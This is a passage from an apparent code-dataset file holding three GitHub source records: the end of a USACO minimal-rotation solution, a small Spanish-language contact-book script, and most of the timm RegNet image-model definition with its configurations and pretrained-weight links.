i += k + 1\n return False\n\ndef isCyclicShifts1(s1, s2):\n L = len(s1)\n if len(s2) != L:\n return False\n s2 = s2 + s2\n return s2.find(s1) != -1\n'''\n\nL = int(input())\nchs = []\nwhile True:\n line = input()\n if line == '':\n break\n chs.extend([ch for ch in line])\n\nchs = ''.join(chs + chs)\n\ni = 0\nj = 1\nwhile i < L and j < L:\n # find first difference\n k = 0\n while k < L and chs[i + k] == chs[j + k]: # i + k, j + k always < 2L\n k += 1\n # iff chs is uniform\n if k == L:\n break\n # advance\n if chs[i + k] < chs[j + k]:\n j += k + 1\n else:\n i += k + 1\n # never start at same place\n if i == j:\n j += 1\n\nprintwrite(min(i, j))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nfin.close()\nfout.close()\ndel print, input\n\n","repo_name":"wrwwctb/USACO","sub_path":"hidden.py","file_name":"hidden.py","file_ext":"py","file_size_in_byte":3689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"39366806887","text":"dic = {}\ndef agregar_contacto(nombre):\n\n apellido = input('Ingresa apellido: ')\n cell = input('Ingresa celular: ')\n correo = input('Ingresa correo: ')\n dic[nombre] = [apellido, cell, correo]\n\ndef buscar_contacto(nombre):\n \n if nombre in dic:\n print(dic[nombre])\n else:\n print('Contacto no encontrado!')\n\ndef eliminar_contacto(nombre):\n \n dic.pop(nombre)\n mostrar_contacto()\n\ndef mostrar_contacto():\n\n print('Contactos: ')\n for position, key in enumerate(dic):\n print(position + 1, key, dic[key])\nwhile True:\n print('***Menu***')\n print('1) Añadir contacto')\n print('2) Eliminar contacto')\n print('3) Mostrar contactos')\n print('4) Buscar contactos')\n print('5) Salir')\n number = int(input('Ingrese un numero para elegir una opcion: '))\n if number == 5:\n break\n elif number != 1 and number != 2 and number != 3 and number != 4:\n print('Error! Escoja una opcion valida')\n else:\n if number == 1:\n nombre = input('Ingresa Nombre: ')\n agregar_contacto(nombre)\n elif number == 2:\n nombre = input('Ingresa Nombre: ')\n elif number == 3:\n mostrar_contacto()\n else:\n nombre = input('Ingresa Nombre: ')\n buscar_contacto","repo_name":"Hiteek/Hello_world_in_python","sub_path":"agenda.py","file_name":"agenda.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"2757429501","text":"import math\nfrom dataclasses import dataclass, replace\nfrom functools import partial\nfrom typing import Optional, Union, Callable\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\n\nfrom timm.data import IMAGENET_DEFAULT_MEAN, IMAGENET_DEFAULT_STD\nfrom timm.layers import ClassifierHead, AvgPool2dSame, ConvNormAct, SEModule, DropPath, GroupNormAct\nfrom timm.layers import get_act_layer, get_norm_act_layer, create_conv2d, make_divisible\nfrom ._builder import build_model_with_cfg\nfrom ._manipulate import checkpoint_seq, named_apply\nfrom ._registry import generate_default_cfgs, register_model, register_model_deprecations\n\n__all__ = ['RegNet', 'RegNetCfg'] # model_registry will add each entrypoint fn to this\n\n\n@dataclass\nclass RegNetCfg:\n depth: int = 21\n w0: int = 80\n wa: float = 42.63\n wm: float = 2.66\n group_size: int = 24\n bottle_ratio: float = 1.\n se_ratio: float = 0.\n group_min_ratio: float = 0.\n stem_width: int = 32\n downsample: Optional[str] = 'conv1x1'\n linear_out: bool = False\n preact: bool = False\n num_features: int = 0\n act_layer: Union[str, Callable] = 'relu'\n norm_layer: Union[str, Callable] = 'batchnorm'\n\n\ndef quantize_float(f, q):\n \"\"\"Converts a float to the closest non-zero int divisible by q.\"\"\"\n return int(round(f / q) * q)\n\n\ndef adjust_widths_groups_comp(widths, bottle_ratios, groups, min_ratio=0.):\n \"\"\"Adjusts the compatibility of widths and groups.\"\"\"\n bottleneck_widths = [int(w * b) for w, b in zip(widths, bottle_ratios)]\n groups = [min(g, w_bot) for g, w_bot in zip(groups, bottleneck_widths)]\n if min_ratio:\n # torchvision uses a different rounding scheme for ensuring bottleneck widths divisible by group widths\n bottleneck_widths = [make_divisible(w_bot, g, min_ratio) for w_bot, g in zip(bottleneck_widths, groups)]\n else:\n bottleneck_widths = [quantize_float(w_bot, g) for w_bot, g in zip(bottleneck_widths, groups)]\n widths = [int(w_bot / b) for w_bot, b in zip(bottleneck_widths, bottle_ratios)]\n return widths, groups\n\n\ndef generate_regnet(width_slope, width_initial, width_mult, depth, group_size, quant=8):\n \"\"\"Generates per block widths from RegNet parameters.\"\"\"\n assert width_slope >= 0 and width_initial > 0 and width_mult > 1 and width_initial % quant == 0\n # TODO dWr scaling?\n # depth = int(depth * (scale ** 0.1))\n # width_scale = scale ** 0.4 # dWr scale, exp 0.8 / 2, applied to both group and layer widths\n widths_cont = np.arange(depth) * width_slope + width_initial\n width_exps = np.round(np.log(widths_cont / width_initial) / np.log(width_mult))\n widths = np.round(np.divide(width_initial * np.power(width_mult, width_exps), quant)) * quant\n num_stages, max_stage = len(np.unique(widths)), width_exps.max() + 1\n groups = np.array([group_size for _ in range(num_stages)])\n return widths.astype(int).tolist(), num_stages, groups.astype(int).tolist()\n\n\ndef downsample_conv(\n in_chs,\n out_chs,\n kernel_size=1,\n stride=1,\n dilation=1,\n norm_layer=None,\n preact=False,\n):\n norm_layer = norm_layer or nn.BatchNorm2d\n kernel_size = 1 if stride == 1 and dilation == 1 else kernel_size\n dilation = dilation if kernel_size > 1 else 1\n if preact:\n return create_conv2d(\n in_chs,\n out_chs,\n kernel_size,\n stride=stride,\n dilation=dilation,\n )\n else:\n return ConvNormAct(\n in_chs,\n out_chs,\n kernel_size,\n stride=stride,\n dilation=dilation,\n norm_layer=norm_layer,\n apply_act=False,\n )\n\n\ndef downsample_avg(\n in_chs,\n out_chs,\n kernel_size=1,\n stride=1,\n dilation=1,\n norm_layer=None,\n preact=False,\n):\n \"\"\" AvgPool Downsampling as in 'D' ResNet variants. This is not in RegNet space but I might experiment.\"\"\"\n norm_layer = norm_layer or nn.BatchNorm2d\n avg_stride = stride if dilation == 1 else 1\n pool = nn.Identity()\n if stride > 1 or dilation > 1:\n avg_pool_fn = AvgPool2dSame if avg_stride == 1 and dilation > 1 else nn.AvgPool2d\n pool = avg_pool_fn(2, avg_stride, ceil_mode=True, count_include_pad=False)\n if preact:\n conv = create_conv2d(in_chs, out_chs, 1, stride=1)\n else:\n conv = ConvNormAct(in_chs, out_chs, 1, stride=1, norm_layer=norm_layer, apply_act=False)\n return nn.Sequential(*[pool, conv])\n\n\ndef create_shortcut(\n downsample_type,\n in_chs,\n out_chs,\n kernel_size,\n stride,\n dilation=(1, 1),\n norm_layer=None,\n preact=False,\n):\n assert downsample_type in ('avg', 'conv1x1', '', None)\n if in_chs != out_chs or stride != 1 or dilation[0] != dilation[1]:\n dargs = dict(stride=stride, dilation=dilation[0], norm_layer=norm_layer, preact=preact)\n if not downsample_type:\n return None # no shortcut, no downsample\n elif downsample_type == 'avg':\n return downsample_avg(in_chs, out_chs, **dargs)\n else:\n return downsample_conv(in_chs, out_chs, kernel_size=kernel_size, **dargs)\n else:\n return nn.Identity() # identity shortcut (no downsample)\n\n\nclass Bottleneck(nn.Module):\n \"\"\" RegNet Bottleneck\n\n This is almost exactly the same as a ResNet Bottlneck. The main difference is the SE block is moved from\n after conv3 to after conv2. Otherwise, it's just redefining the arguments for groups/bottleneck channels.\n \"\"\"\n\n def __init__(\n self,\n in_chs,\n out_chs,\n stride=1,\n dilation=(1, 1),\n bottle_ratio=1,\n group_size=1,\n se_ratio=0.25,\n downsample='conv1x1',\n linear_out=False,\n act_layer=nn.ReLU,\n norm_layer=nn.BatchNorm2d,\n drop_block=None,\n drop_path_rate=0.,\n ):\n super(Bottleneck, self).__init__()\n act_layer = get_act_layer(act_layer)\n bottleneck_chs = int(round(out_chs * bottle_ratio))\n groups = bottleneck_chs // group_size\n\n cargs = dict(act_layer=act_layer, norm_layer=norm_layer)\n self.conv1 = ConvNormAct(in_chs, bottleneck_chs, kernel_size=1, **cargs)\n self.conv2 = ConvNormAct(\n bottleneck_chs,\n bottleneck_chs,\n kernel_size=3,\n stride=stride,\n dilation=dilation[0],\n groups=groups,\n drop_layer=drop_block,\n **cargs,\n )\n if se_ratio:\n se_channels = int(round(in_chs * se_ratio))\n self.se = SEModule(bottleneck_chs, rd_channels=se_channels, act_layer=act_layer)\n else:\n self.se = nn.Identity()\n self.conv3 = ConvNormAct(bottleneck_chs, out_chs, kernel_size=1, apply_act=False, **cargs)\n self.act3 = nn.Identity() if linear_out else act_layer()\n self.downsample = create_shortcut(\n downsample,\n in_chs,\n out_chs,\n kernel_size=1,\n stride=stride,\n dilation=dilation,\n norm_layer=norm_layer,\n )\n self.drop_path = DropPath(drop_path_rate) if drop_path_rate > 0 else nn.Identity()\n\n def zero_init_last(self):\n nn.init.zeros_(self.conv3.bn.weight)\n\n def forward(self, x):\n shortcut = x\n x = self.conv1(x)\n x = self.conv2(x)\n x = self.se(x)\n x = self.conv3(x)\n if self.downsample is not None:\n # NOTE stuck with downsample as the attr name due to weight compatibility\n # now represents the shortcut, no shortcut if None, and non-downsample shortcut == nn.Identity()\n x = self.drop_path(x) + self.downsample(shortcut)\n x = self.act3(x)\n return x\n\n\nclass PreBottleneck(nn.Module):\n \"\"\" RegNet Bottleneck\n\n This is almost exactly the same as a ResNet Bottlneck. The main difference is the SE block is moved from\n after conv3 to after conv2. Otherwise, it's just redefining the arguments for groups/bottleneck channels.\n \"\"\"\n\n def __init__(\n self,\n in_chs,\n out_chs,\n stride=1,\n dilation=(1, 1),\n bottle_ratio=1,\n group_size=1,\n se_ratio=0.25,\n downsample='conv1x1',\n linear_out=False,\n act_layer=nn.ReLU,\n norm_layer=nn.BatchNorm2d,\n drop_block=None,\n drop_path_rate=0.,\n ):\n super(PreBottleneck, self).__init__()\n norm_act_layer = get_norm_act_layer(norm_layer, act_layer)\n bottleneck_chs = int(round(out_chs * bottle_ratio))\n groups = bottleneck_chs // group_size\n\n self.norm1 = norm_act_layer(in_chs)\n self.conv1 = create_conv2d(in_chs, bottleneck_chs, kernel_size=1)\n self.norm2 = norm_act_layer(bottleneck_chs)\n self.conv2 = create_conv2d(\n bottleneck_chs,\n bottleneck_chs,\n kernel_size=3,\n stride=stride,\n dilation=dilation[0],\n groups=groups,\n )\n if se_ratio:\n se_channels = int(round(in_chs * se_ratio))\n self.se = SEModule(bottleneck_chs, rd_channels=se_channels, act_layer=act_layer)\n else:\n self.se = nn.Identity()\n self.norm3 = norm_act_layer(bottleneck_chs)\n self.conv3 = create_conv2d(bottleneck_chs, out_chs, kernel_size=1)\n self.downsample = create_shortcut(\n downsample,\n in_chs,\n out_chs,\n kernel_size=1,\n stride=stride,\n dilation=dilation,\n preact=True,\n )\n self.drop_path = DropPath(drop_path_rate) if drop_path_rate > 0 else nn.Identity()\n\n def zero_init_last(self):\n pass\n\n def forward(self, x):\n x = self.norm1(x)\n shortcut = x\n x = self.conv1(x)\n x = self.norm2(x)\n x = self.conv2(x)\n x = self.se(x)\n x = self.norm3(x)\n x = self.conv3(x)\n if self.downsample is not None:\n # NOTE stuck with downsample as the attr name due to weight compatibility\n # now represents the shortcut, no shortcut if None, and non-downsample shortcut == nn.Identity()\n x = self.drop_path(x) + self.downsample(shortcut)\n return x\n\n\nclass RegStage(nn.Module):\n \"\"\"Stage (sequence of blocks w/ the same output shape).\"\"\"\n\n def __init__(\n self,\n depth,\n in_chs,\n out_chs,\n stride,\n dilation,\n drop_path_rates=None,\n block_fn=Bottleneck,\n **block_kwargs,\n ):\n super(RegStage, self).__init__()\n self.grad_checkpointing = False\n\n first_dilation = 1 if dilation in (1, 2) else 2\n for i in range(depth):\n block_stride = stride if i == 0 else 1\n block_in_chs = in_chs if i == 0 else out_chs\n block_dilation = (first_dilation, dilation)\n dpr = drop_path_rates[i] if drop_path_rates is not None else 0.\n name = \"b{}\".format(i + 1)\n self.add_module(\n name,\n block_fn(\n block_in_chs,\n out_chs,\n stride=block_stride,\n dilation=block_dilation,\n drop_path_rate=dpr,\n **block_kwargs,\n )\n )\n first_dilation = dilation\n\n def forward(self, x):\n if self.grad_checkpointing and not torch.jit.is_scripting():\n x = checkpoint_seq(self.children(), x)\n else:\n for block in self.children():\n x = block(x)\n return x\n\n\nclass RegNet(nn.Module):\n \"\"\"RegNet-X, Y, and Z Models\n\n Paper: https://arxiv.org/abs/2003.13678\n Original Impl: https://github.com/facebookresearch/pycls/blob/master/pycls/models/regnet.py\n \"\"\"\n\n def __init__(\n self,\n cfg: RegNetCfg,\n in_chans=3,\n num_classes=1000,\n output_stride=32,\n global_pool='avg',\n drop_rate=0.,\n drop_path_rate=0.,\n zero_init_last=True,\n **kwargs,\n ):\n \"\"\"\n\n Args:\n cfg (RegNetCfg): Model architecture configuration\n in_chans (int): Number of input channels (default: 3)\n num_classes (int): Number of classifier classes (default: 1000)\n output_stride (int): Output stride of network, one of (8, 16, 32) (default: 32)\n global_pool (str): Global pooling type (default: 'avg')\n drop_rate (float): Dropout rate (default: 0.)\n drop_path_rate (float): Stochastic depth drop-path rate (default: 0.)\n zero_init_last (bool): Zero-init last weight of residual path\n kwargs (dict): Extra kwargs overlayed onto cfg\n \"\"\"\n super().__init__()\n self.num_classes = num_classes\n self.drop_rate = drop_rate\n assert output_stride in (8, 16, 32)\n cfg = replace(cfg, **kwargs) # update cfg with extra passed kwargs\n\n # Construct the stem\n stem_width = cfg.stem_width\n na_args = dict(act_layer=cfg.act_layer, norm_layer=cfg.norm_layer)\n if cfg.preact:\n self.stem = create_conv2d(in_chans, stem_width, 3, stride=2)\n else:\n self.stem = ConvNormAct(in_chans, stem_width, 3, stride=2, **na_args)\n self.feature_info = [dict(num_chs=stem_width, reduction=2, module='stem')]\n\n # Construct the stages\n prev_width = stem_width\n curr_stride = 2\n per_stage_args, common_args = self._get_stage_args(\n cfg,\n output_stride=output_stride,\n drop_path_rate=drop_path_rate,\n )\n assert len(per_stage_args) == 4\n block_fn = PreBottleneck if cfg.preact else Bottleneck\n for i, stage_args in enumerate(per_stage_args):\n stage_name = \"s{}\".format(i + 1)\n self.add_module(\n stage_name,\n RegStage(\n in_chs=prev_width,\n block_fn=block_fn,\n **stage_args,\n **common_args,\n )\n )\n prev_width = stage_args['out_chs']\n curr_stride *= stage_args['stride']\n self.feature_info += [dict(num_chs=prev_width, reduction=curr_stride, module=stage_name)]\n\n # Construct the head\n if cfg.num_features:\n self.final_conv = ConvNormAct(prev_width, cfg.num_features, kernel_size=1, **na_args)\n self.num_features = cfg.num_features\n else:\n final_act = cfg.linear_out or cfg.preact\n self.final_conv = get_act_layer(cfg.act_layer)() if final_act else nn.Identity()\n self.num_features = prev_width\n self.head = ClassifierHead(\n in_features=self.num_features,\n num_classes=num_classes,\n pool_type=global_pool,\n drop_rate=drop_rate,\n )\n\n named_apply(partial(_init_weights, zero_init_last=zero_init_last), self)\n\n def _get_stage_args(self, cfg: RegNetCfg, default_stride=2, output_stride=32, drop_path_rate=0.):\n # Generate RegNet ws per block\n widths, num_stages, stage_gs = generate_regnet(cfg.wa, cfg.w0, cfg.wm, cfg.depth, cfg.group_size)\n\n # Convert to per stage format\n stage_widths, stage_depths = np.unique(widths, return_counts=True)\n stage_br = [cfg.bottle_ratio for _ in range(num_stages)]\n stage_strides = []\n stage_dilations = []\n net_stride = 2\n dilation = 1\n for _ in range(num_stages):\n if net_stride >= output_stride:\n dilation *= default_stride\n stride = 1\n else:\n stride = default_stride\n net_stride *= stride\n stage_strides.append(stride)\n stage_dilations.append(dilation)\n stage_dpr = np.split(np.linspace(0, drop_path_rate, sum(stage_depths)), np.cumsum(stage_depths[:-1]))\n\n # Adjust the compatibility of ws and gws\n stage_widths, stage_gs = adjust_widths_groups_comp(\n stage_widths, stage_br, stage_gs, min_ratio=cfg.group_min_ratio)\n arg_names = ['out_chs', 'stride', 'dilation', 'depth', 'bottle_ratio', 'group_size', 'drop_path_rates']\n per_stage_args = [\n dict(zip(arg_names, params)) for params in\n zip(stage_widths, stage_strides, stage_dilations, stage_depths, stage_br, stage_gs, stage_dpr)\n ]\n common_args = dict(\n downsample=cfg.downsample,\n se_ratio=cfg.se_ratio,\n linear_out=cfg.linear_out,\n act_layer=cfg.act_layer,\n norm_layer=cfg.norm_layer,\n )\n return per_stage_args, common_args\n\n @torch.jit.ignore\n def group_matcher(self, coarse=False):\n return dict(\n stem=r'^stem',\n blocks=r'^s(\\d+)' if coarse else r'^s(\\d+)\\.b(\\d+)',\n )\n\n @torch.jit.ignore\n def set_grad_checkpointing(self, enable=True):\n for s in list(self.children())[1:-1]:\n s.grad_checkpointing = enable\n\n @torch.jit.ignore\n def get_classifier(self):\n return self.head.fc\n\n def reset_classifier(self, num_classes, global_pool='avg'):\n self.head.reset(num_classes, pool_type=global_pool)\n\n def forward_features(self, x):\n x = self.stem(x)\n x = self.s1(x)\n x = self.s2(x)\n x = self.s3(x)\n x = self.s4(x)\n x = self.final_conv(x)\n return x\n\n def forward_head(self, x, pre_logits: bool = False):\n return self.head(x, pre_logits=pre_logits)\n\n def forward(self, x):\n x = self.forward_features(x)\n x = self.forward_head(x)\n return x\n\n\ndef _init_weights(module, name='', zero_init_last=False):\n if isinstance(module, nn.Conv2d):\n fan_out = module.kernel_size[0] * module.kernel_size[1] * module.out_channels\n fan_out //= module.groups\n module.weight.data.normal_(0, math.sqrt(2.0 / fan_out))\n if module.bias is not None:\n module.bias.data.zero_()\n elif isinstance(module, nn.Linear):\n nn.init.normal_(module.weight, mean=0.0, std=0.01)\n if module.bias is not None:\n nn.init.zeros_(module.bias)\n elif zero_init_last and hasattr(module, 'zero_init_last'):\n module.zero_init_last()\n\n\ndef _filter_fn(state_dict):\n state_dict = state_dict.get('model', state_dict)\n replaces = [\n ('f.a.0', 'conv1.conv'),\n ('f.a.1', 'conv1.bn'),\n ('f.b.0', 'conv2.conv'),\n ('f.b.1', 'conv2.bn'),\n ('f.final_bn', 'conv3.bn'),\n ('f.se.excitation.0', 'se.fc1'),\n ('f.se.excitation.2', 'se.fc2'),\n ('f.se', 'se'),\n ('f.c.0', 'conv3.conv'),\n ('f.c.1', 'conv3.bn'),\n ('f.c', 'conv3.conv'),\n ('proj.0', 'downsample.conv'),\n ('proj.1', 'downsample.bn'),\n ('proj', 'downsample.conv'),\n ]\n if 'classy_state_dict' in state_dict:\n # classy-vision & vissl (SEER) weights\n import re\n state_dict = state_dict['classy_state_dict']['base_model']['model']\n out = {}\n for k, v in state_dict['trunk'].items():\n k = k.replace('_feature_blocks.conv1.stem.0', 'stem.conv')\n k = k.replace('_feature_blocks.conv1.stem.1', 'stem.bn')\n k = re.sub(\n r'^_feature_blocks.res\\d.block(\\d)-(\\d+)',\n lambda x: f's{int(x.group(1))}.b{int(x.group(2)) + 1}', k)\n k = re.sub(r's(\\d)\\.b(\\d+)\\.bn', r's\\1.b\\2.downsample.bn', k)\n for s, r in replaces:\n k = k.replace(s, r)\n out[k] = v\n for k, v in state_dict['heads'].items():\n if 'projection_head' in k or 'prototypes' in k:\n continue\n k = k.replace('0.clf.0', 'head.fc')\n out[k] = v\n return out\n if 'stem.0.weight' in state_dict:\n # torchvision weights\n import re\n out = {}\n for k, v in state_dict.items():\n k = k.replace('stem.0', 'stem.conv')\n k = k.replace('stem.1', 'stem.bn')\n k = re.sub(\n r'trunk_output.block(\\d)\\.block(\\d+)\\-(\\d+)',\n lambda x: f's{int(x.group(1))}.b{int(x.group(3)) + 1}', k)\n for s, r in replaces:\n k = k.replace(s, r)\n k = k.replace('fc.', 'head.fc.')\n out[k] = v\n return out\n return state_dict\n\n\n# Model FLOPS = three trailing digits * 10^8\nmodel_cfgs = dict(\n # RegNet-X\n regnetx_002=RegNetCfg(w0=24, wa=36.44, wm=2.49, group_size=8, depth=13),\n regnetx_004=RegNetCfg(w0=24, wa=24.48, wm=2.54, group_size=16, depth=22),\n regnetx_004_tv=RegNetCfg(w0=24, wa=24.48, wm=2.54, group_size=16, depth=22, group_min_ratio=0.9),\n regnetx_006=RegNetCfg(w0=48, wa=36.97, wm=2.24, group_size=24, depth=16),\n regnetx_008=RegNetCfg(w0=56, wa=35.73, wm=2.28, group_size=16, depth=16),\n regnetx_016=RegNetCfg(w0=80, wa=34.01, wm=2.25, group_size=24, depth=18),\n regnetx_032=RegNetCfg(w0=88, wa=26.31, wm=2.25, group_size=48, depth=25),\n regnetx_040=RegNetCfg(w0=96, wa=38.65, wm=2.43, group_size=40, depth=23),\n regnetx_064=RegNetCfg(w0=184, wa=60.83, wm=2.07, group_size=56, depth=17),\n regnetx_080=RegNetCfg(w0=80, wa=49.56, wm=2.88, group_size=120, depth=23),\n regnetx_120=RegNetCfg(w0=168, wa=73.36, wm=2.37, group_size=112, depth=19),\n regnetx_160=RegNetCfg(w0=216, wa=55.59, wm=2.1, group_size=128, depth=22),\n regnetx_320=RegNetCfg(w0=320, wa=69.86, wm=2.0, group_size=168, depth=23),\n\n # RegNet-Y\n regnety_002=RegNetCfg(w0=24, wa=36.44, wm=2.49, group_size=8, depth=13, se_ratio=0.25),\n regnety_004=RegNetCfg(w0=48, wa=27.89, wm=2.09, group_size=8, depth=16, se_ratio=0.25),\n regnety_006=RegNetCfg(w0=48, wa=32.54, wm=2.32, group_size=16, depth=15, se_ratio=0.25),\n regnety_008=RegNetCfg(w0=56, wa=38.84, wm=2.4, group_size=16, depth=14, se_ratio=0.25),\n regnety_008_tv=RegNetCfg(w0=56, wa=38.84, wm=2.4, group_size=16, depth=14, se_ratio=0.25, group_min_ratio=0.9),\n regnety_016=RegNetCfg(w0=48, wa=20.71, wm=2.65, group_size=24, depth=27, se_ratio=0.25),\n regnety_032=RegNetCfg(w0=80, wa=42.63, wm=2.66, group_size=24, depth=21, se_ratio=0.25),\n regnety_040=RegNetCfg(w0=96, wa=31.41, wm=2.24, group_size=64, depth=22, se_ratio=0.25),\n regnety_064=RegNetCfg(w0=112, wa=33.22, wm=2.27, group_size=72, depth=25, se_ratio=0.25),\n regnety_080=RegNetCfg(w0=192, wa=76.82, wm=2.19, group_size=56, depth=17, se_ratio=0.25),\n regnety_080_tv=RegNetCfg(w0=192, wa=76.82, wm=2.19, group_size=56, depth=17, se_ratio=0.25, group_min_ratio=0.9),\n regnety_120=RegNetCfg(w0=168, wa=73.36, wm=2.37, group_size=112, depth=19, se_ratio=0.25),\n regnety_160=RegNetCfg(w0=200, wa=106.23, wm=2.48, group_size=112, depth=18, se_ratio=0.25),\n regnety_320=RegNetCfg(w0=232, wa=115.89, wm=2.53, group_size=232, depth=20, se_ratio=0.25),\n regnety_640=RegNetCfg(w0=352, wa=147.48, wm=2.4, group_size=328, depth=20, se_ratio=0.25),\n regnety_1280=RegNetCfg(w0=456, wa=160.83, wm=2.52, group_size=264, depth=27, se_ratio=0.25),\n regnety_2560=RegNetCfg(w0=640, wa=230.83, wm=2.53, group_size=373, depth=27, se_ratio=0.25),\n #regnety_2560=RegNetCfg(w0=640, wa=124.47, wm=2.04, group_size=848, depth=27, se_ratio=0.25),\n\n # Experimental\n regnety_040_sgn=RegNetCfg(\n w0=96, wa=31.41, wm=2.24, group_size=64, depth=22, se_ratio=0.25,\n act_layer='silu', norm_layer=partial(GroupNormAct, group_size=16)),\n\n # regnetv = 'preact regnet y'\n regnetv_040=RegNetCfg(\n depth=22, w0=96, wa=31.41, wm=2.24, group_size=64, se_ratio=0.25, preact=True, act_layer='silu'),\n regnetv_064=RegNetCfg(\n depth=25, w0=112, wa=33.22, wm=2.27, group_size=72, se_ratio=0.25, preact=True, act_layer='silu',\n downsample='avg'),\n\n # RegNet-Z (unverified)\n regnetz_005=RegNetCfg(\n depth=21, w0=16, wa=10.7, wm=2.51, group_size=4, bottle_ratio=4.0, se_ratio=0.25,\n downsample=None, linear_out=True, num_features=1024, act_layer='silu',\n ),\n regnetz_040=RegNetCfg(\n depth=28, w0=48, wa=14.5, wm=2.226, group_size=8, bottle_ratio=4.0, se_ratio=0.25,\n downsample=None, linear_out=True, num_features=0, act_layer='silu',\n ),\n regnetz_040_h=RegNetCfg(\n depth=28, w0=48, wa=14.5, wm=2.226, group_size=8, bottle_ratio=4.0, se_ratio=0.25,\n downsample=None, linear_out=True, num_features=1536, act_layer='silu',\n ),\n)\n\n\ndef _create_regnet(variant, pretrained, **kwargs):\n return build_model_with_cfg(\n RegNet, variant, pretrained,\n model_cfg=model_cfgs[variant],\n pretrained_filter_fn=_filter_fn,\n **kwargs)\n\n\ndef _cfg(url='', **kwargs):\n return {\n 'url': url, 'num_classes': 1000, 'input_size': (3, 224, 224), 'pool_size': (7, 7),\n 'test_input_size': (3, 288, 288), 'crop_pct': 0.95, 'test_crop_pct': 1.0,\n 'interpolation': 'bicubic', 'mean': IMAGENET_DEFAULT_MEAN, 'std': IMAGENET_DEFAULT_STD,\n 'first_conv': 'stem.conv', 'classifier': 'head.fc',\n **kwargs\n }\n\n\ndef _cfgpyc(url='', **kwargs):\n return {\n 'url': url, 'num_classes': 1000, 'input_size': (3, 224, 224), 'pool_size': (7, 7),\n 'crop_pct': 0.875, 'interpolation': 'bicubic',\n 'mean': IMAGENET_DEFAULT_MEAN, 'std': IMAGENET_DEFAULT_STD,\n 'first_conv': 'stem.conv', 'classifier': 'head.fc',\n 'license': 'mit', 'origin_url': 'https://github.com/facebookresearch/pycls', **kwargs\n }\n\n\ndef _cfgtv2(url='', **kwargs):\n return {\n 'url': url, 'num_classes': 1000, 'input_size': (3, 224, 224), 'pool_size': (7, 7),\n 'crop_pct': 0.965, 'interpolation': 'bicubic',\n 'mean': IMAGENET_DEFAULT_MEAN, 'std': IMAGENET_DEFAULT_STD,\n 'first_conv': 'stem.conv', 'classifier': 'head.fc',\n 'license': 'bsd-3-clause', 'origin_url': 'https://github.com/pytorch/vision', **kwargs\n }\n\n\ndefault_cfgs = generate_default_cfgs({\n # timm trained models\n 'regnety_032.ra_in1k': _cfg(\n hf_hub_id='timm/',\n url='https://github.com/huggingface/pytorch-image-models/releases/download/v0.1-weights/regnety_032_ra-7f2439f9.pth'),\n 'regnety_040.ra3_in1k': _cfg(\n hf_hub_id='timm/',\n url='https://github.com/huggingface/pytorch-image-models/releases/download/v0.1-tpu-weights/regnety_040_ra3-670e1166.pth'),\n 'regnety_064.ra3_in1k': _cfg(\n hf_hub_id='timm/',\n url='https://github.com/huggingface/pytorch-image-models/releases/download/v0.1-tpu-weights/regnety_064_ra3-aa26dc7d.pth'),\n 'regnety_080.ra3_in1k': _cfg(\n hf_hub_id='timm/',\n url='https://github.com/huggingface/pytorch-image-models/releases/download/v0.1-tpu-weights/regnety_080_ra3-1fdc4344.pth'),\n 'regnety_120.sw_in12k_ft_in1k': _cfg(hf_hub_id='timm/'),\n 'regnety_160.sw_in12k_ft_in1k': _cfg(hf_hub_id='timm/'),\n 'regnety_160.lion_in12k_ft_in1k': _cfg(hf_hub_id='timm/'),\n\n # timm in12k pretrain\n 'regnety_120.sw_in12k': _cfg(\n hf_hub_id='timm/',\n num_classes=11821),\n 'regnety_160.sw_in12k': _cfg(\n hf_hub_id='timm/',\n num_classes=11821),\n\n # timm custom arch (v and z guess) + trained models\n 'regnety_040_sgn.untrained': _cfg(url=''),\n 'regnetv_040.ra3_in1k': _cfg(\n hf_hub_id='timm/',\n url='https://github.com/huggingface/pytorch-image-models/releases/download/v0.1-tpu-weights/regnetv_040_ra3-c248f51f.pth',\n first_conv='stem'),\n 'regnetv_064.ra3_in1k': _cfg(\n hf_hub_id='timm/',\n url='https://github.com/huggingface/pytorch-image-models/releases/download/v0.1-tpu-weights/regnetv_064_ra3-530616c2.pth',\n first_conv='stem'),\n\n 'regnetz_005.untrained': _cfg(url=''),\n 'regnetz_040.ra3_in1k': _cfg(\n hf_hub_id='timm/',\n url='https://github.com/huggingface/pytorch-image-models/releases/download/v0.1-tpu-weights/regnetz_040_ra3-9007edf5.pth',\n input_size=(3, 256, 256), pool_size=(8, 8), crop_pct=1.0, test_input_size=(3, 320, 320)),\n 'regnetz_040_h.ra3_in1k': _cfg(\n hf_hub_id='timm/',\n url='https://github.com/huggingface/pytorch-image-models/releases/download/v0.1-tpu-weights/regnetz_040h_ra3-f594343b.pth',\n input_size=(3, 256, 256), pool_size=(8, 8), crop_pct=1.0, test_input_size=(3, 320, 320)),\n\n # used in DeiT for distillation (from Facebook DeiT GitHub repository)\n 'regnety_160.deit_in1k': _cfg(\n hf_hub_id='timm/', url='https://dl.fbaipublicfiles.com/deit/regnety_160-a5fe301d.pth'),\n\n 'regnetx_004_tv.tv2_in1k': _cfgtv2(\n hf_hub_id='timm/',\n url='https://download.pytorch.org/models/regnet_x_400mf-62229a5f.pth'),\n 'regnetx_008.tv2_in1k': _cfgtv2(\n hf_hub_id='timm/',\n url='https://download.pytorch.org/models/regnet_x_800mf-94a99ebd.pth'),\n 'regnetx_016.tv2_in1k': _cfgtv2(\n hf_hub_id='timm/',\n url='https://download.pytorch.org/models/regnet_x_1_6gf-a12f2b72.pth'),\n 'regnetx_032.tv2_in1k': _cfgtv2(\n hf_hub_id='timm/',\n url='https://download.pytorch.org/models/regnet_x_3_2gf-7071aa85.pth'),\n 'regnetx_080.tv2_in1k': _cfgtv2(\n hf_hub_id='timm/',\n url='https://download.pytorch.org/models/regnet_x_8gf-2b70d774.pth'),\n 'regnetx_160.tv2_in1k': _cfgtv2(\n hf_hub_id='timm/',\n url='https://download.pytorch.org/models/regnet_x_16gf-ba3796d7.pth'),\n 'regnetx_320.tv2_in1k': _cfgtv2(\n hf_hub_id='timm/',\n url='https://download.pytorch.org/models/regnet_x_32gf-6eb8fdc6.pth'),\n\n 'regnety_004.tv2_in1k': _cfgtv2(\n hf_hub_id='timm/',\n 